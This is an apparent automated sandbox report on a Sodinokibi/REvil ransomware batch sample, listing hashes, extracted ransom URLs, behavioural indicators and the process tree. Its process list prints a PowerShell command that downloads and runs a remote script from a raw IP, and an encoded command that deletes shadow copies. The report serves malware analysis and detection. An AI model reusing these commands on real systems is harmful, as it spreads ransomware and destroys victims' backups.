Analysis
-
max time kernel
137s -
max time network
54s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
08-06-2020 00:10
Static task
static1
Behavioral task
behavioral1
Sample
834fe3c10a5c6788c12a8dfd6b3a22bc.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
834fe3c10a5c6788c12a8dfd6b3a22bc.bat
Resource
win10v200430
General
-
Target
834fe3c10a5c6788c12a8dfd6b3a22bc.bat
-
Size
219B
-
MD5
9aeae02203b8a1236ef5aa06a8df49df
-
SHA1
f33e529e1dd812bd81e80fcc6b08c5d019184c74
-
SHA256
4792e10c28499b9868f31d6a7dd670cf12a22f14d11a7b0bb8c781289743eed7
-
SHA512
fdfe723f2cbf8c3f3b1a8b4211955bc60bf24f98ac81a719821e52ed5883cbdbf8b872107b5b4ae1ae5f3a6477f201f59c9452641624f4f06a61358b8013dc6e
Malware Config
Extracted
http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc
Extracted
C:\385fl2i-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D80EBFA21144DC89
http://decryptor.cc/D80EBFA21144DC89
Signatures
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 996 powershell.exe Token: SeDebugPrivilege 996 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeBackupPrivilege 1612 vssvc.exe Token: SeRestorePrivilege 1612 vssvc.exe Token: SeAuditPrivilege 1612 vssvc.exe Token: SeTakeOwnershipPrivilege 996 powershell.exe -
Drops file in Program Files directory 23 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ConfirmSend.pcx powershell.exe File opened for modification \??\c:\program files\RequestLock.search-ms powershell.exe File opened for modification \??\c:\program files\SelectExpand.pptx powershell.exe File opened for modification \??\c:\program files\UnlockConfirm.edrwx powershell.exe File opened for modification \??\c:\program files\ConvertToEnable.3g2 powershell.exe File opened for modification \??\c:\program files\ExpandTrace.vssx powershell.exe File opened for modification \??\c:\program files\MountRequest.rmi powershell.exe File opened for modification \??\c:\program files\SwitchClear.eps powershell.exe File opened for modification \??\c:\program files\ImportRevoke.xsl powershell.exe File opened for modification \??\c:\program files\SetUse.vstx powershell.exe File opened for modification \??\c:\program files\StopRevoke.xsl powershell.exe File opened for modification \??\c:\program files\SuspendHide.ppsm powershell.exe File created \??\c:\program files (x86)\385fl2i-readme.txt powershell.exe File opened for modification \??\c:\program files\CompleteMeasure.vsw powershell.exe File opened for modification \??\c:\program files\ConfirmCopy.csv powershell.exe File opened for modification \??\c:\program files\ExpandRequest.bmp powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\385fl2i-readme.txt powershell.exe File opened for modification \??\c:\program files\TestFind.m4v powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\385fl2i-readme.txt powershell.exe File created \??\c:\program files\385fl2i-readme.txt powershell.exe File opened for modification \??\c:\program files\DismountWait.edrwx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\385fl2i-readme.txt powershell.exe File opened for modification \??\c:\program files\RenameSend.pptm powershell.exe -
Enumerates connected drives 3 TTPs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 996 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1492 wrote to memory of 996 1492 cmd.exe powershell.exe PID 996 wrote to memory of 1768 996 powershell.exe powershell.exe PID 996 wrote to memory of 1768 996 powershell.exe powershell.exe PID 996 wrote to memory of 1768 996 powershell.exe powershell.exe PID 996 wrote to memory of 1768 996 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 996 powershell.exe 996 powershell.exe 996 powershell.exe 1768 powershell.exe 1768 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe 996 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 996 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9160cz7m.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\834fe3c10a5c6788c12a8dfd6b3a22bc.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc');Invoke-XMIUQZERWSSC;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
PID:996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1768
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1612